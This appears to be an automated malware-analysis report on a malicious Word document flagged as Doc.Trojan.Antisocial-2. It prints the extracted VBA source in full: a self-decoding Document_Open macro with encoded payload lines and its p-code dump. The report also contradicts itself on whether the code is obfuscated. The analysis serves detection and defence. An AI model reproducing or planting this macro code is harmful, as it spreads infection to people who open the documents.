Verdict: MALICIOUS
Risk Score: 180

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Document_Open macro, which runs automatically when the document is opened and is a common technique in malicious documents. The macro code is heavily obfuscated, making it difficult to determine the exact payload, but it is designed to execute arbitrary code. This suggests the document is a malicious attachment intended to deliver second-stage malware.
Heuristics (3)

- ClamAV: Doc.Trojan.Antisocial-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Antisocial-2
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4656 bytes |

SHA-256: 2554fed459dbb7867468640550d1644817bece7964834677eeb6a29e0ea3f930

Detection:
- ClamAV: Doc.Trojan.Antisocial-2
- Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open(): Application.EnableCancelKey = wdCancelDisabled
For d = 6 To ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: C$ = ""
I = (ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(d, 1))
f = (Mid(I, 2, 1)): For X = 3 To Len(I): B$ = Asc(Mid(I, X, 1)) - f: C$ = C$ & Chr(B$): Next X: A = C$
ThisDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine d, A: Next d: End Sub
'6Vxo|gzk&Y{h&Jui{sktzeIruyk./@&Uvzouty4Yg|kTuxsgrVxusvz&C&6
'5Tuyntsx3HtsknwrHts{jwxntsx%B%5?%Tuyntsx3[nwzxUwtyjhynts%B%5
'5Xjy%HR%B%YmnxIthzrjsy3[GUwtojhy3[GHtrutsjsyx3Nyjr-6.3HtijRtizqj
'3Vhw#DG#@#DfwlyhGrfxphqw1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh
'3Vhw#QW#@#QrupdoWhpsodwh1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh
'7Mvy'k'D'='[v'JT5Jv|u{VmSpulzA'J+'D'))A'P'D'/JT5Spulz/k3'800
'1g!>!Jou)Soe!+!9*!,!2;!Gps!Y!>!2!Up!Mfo)J*;!C%!>!Btd)Nje)J-!Y-!2**!,!g;!D%!>!D%!'!Dis)C%*;!Ofyu!Y;!B!>!D%
'7[opzKvj|tlu{5]IWyvqlj{5]IJvtwvulu{z5P{lt/805JvklTvk|sl5YlwshjlSpul'k3').)'-'m'-'HA'Ul {'k
'7TJ'D'JT5Spulz/83'JT5Jv|u{VmSpulz0
'6GJ4JkrkzkRotky&72&GJ4Iu{tzUlRotky@&GJ4GjjLxusYzxotm&SI
'1OU/EfmfufMjoft!2-!OU/DpvouPgMjoft;!OU/BeeGspnTusjoh!ND
'4EgxmziHsgyqirx2WeziEw$JmpiReqi>AEgxmziHsgyqirx2JyppReqi>$Irh$Wyf
'7.[ol'Kltvyhsp�h{pvu'Vm'[ol'Kltlhu
'7.[l|mspzjo']vu'S€z'Rv}pjR
' Processing file: /opt/analyzer/scan_staging/b0938e1c96f242e580b132dd1aaae66c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 13703 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' BoS 0x0000
' Ld wdCancelDisabled
' Ld Application
' MemSt EnableCancelKey
' Line #1:
' StartForVariable
' Ld d
' EndForVariable
' LitDI2 0x0006
' LitDI2 0x0001
' Ld ThisDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' MemLd CountOfLines
' For
' BoS 0x0000
' LitStr 0x0000 ""
' St C$
' Line #2:
' Ld d
' LitDI2 0x0001
' LitDI2 0x0001
' Ld ThisDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' Paren
' St I
' Line #3:
' Ld I
' LitDI2 0x0002
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' Paren
' St False
' BoS 0x0000
' StartForVariable
' Ld X
' EndForVariable
' LitDI2 0x0003
' Ld I
' FnLen
' For
' BoS 0x0000
' Ld I
' Ld X
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' ArgsLd Asc 0x0001
' Ld False
' Sub
' St B$
' BoS 0x0000
' Ld C$
' Ld B$
' ArgsLd Chr 0x0001
' Concat
' St C$
' BoS 0x0000
' StartForVariable
' Ld X
' EndForVariable
' NextVar
' BoS 0x0000
' Ld C$
' St A
' Line #4:
' Ld d
' Ld A
' LitDI2 0x0001
' Ld ThisDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd CodeModule
' ArgsMemCall ReplaceLine 0x0002
' BoS 0x0000
' StartForVariable
' Ld d
' EndForVariable
' NextVar
' BoS 0x0000
' EndSub
' Line #5:
' QuoteRem 0x0000 0x003B "6Vxo|gzk&Y{h&Jui{sktzeIruyk./@&Uvzouty4Yg|kTuxsgrVxusvz&C&6"
' Line #6:
' QuoteRem 0x0000 0x003C "5Tuyntsx3HtsknwrHts{jwxntsx%B%5?%Tuyntsx3[nwzxUwtyjhynts%B%5"
' Line #7:
' QuoteRem 0x0000 0x0040 "5Xjy%HR%B%YmnxIthzrjsy3[GUwtojhy3[GHtrutsjsyx3Nyjr-6.3HtijRtizqj"
' Line #8:
' QuoteRem 0x0000 0x0042 "3Vhw#DG#@#DfwlyhGrfxphqw1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh"
' Line #9:
' QuoteRem 0x0000 0x0042 "3Vhw#QW#@#QrupdoWhpsodwh1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh"
' Line #10:
' QuoteRem 0x0000 0x003C "7Mvy'k'D'='[v'JT5Jv|u{VmSpulzA'J+'D'))A'P'D'/JT5Spulz/k3'800"
' Line #11:
' QuoteRem 0x0000 0x0069 "1g!>!Jou)Soe!+!9*!,!2;!Gps!Y!>!2!Up!Mfo)J*;!C%!>!Btd)Nje)J-!Y-!2**!,!g;!D%!>!D%!'!Dis)C%*;!Ofyu!Y;!B!>!D%"
' Line #12:
' QuoteRem 0x0000 0x005A "7[opzKvj|tlu{5]IWyvqlj{5]IJvtwvulu{z5P{lt/805JvklTvk|sl5
```

... (truncated)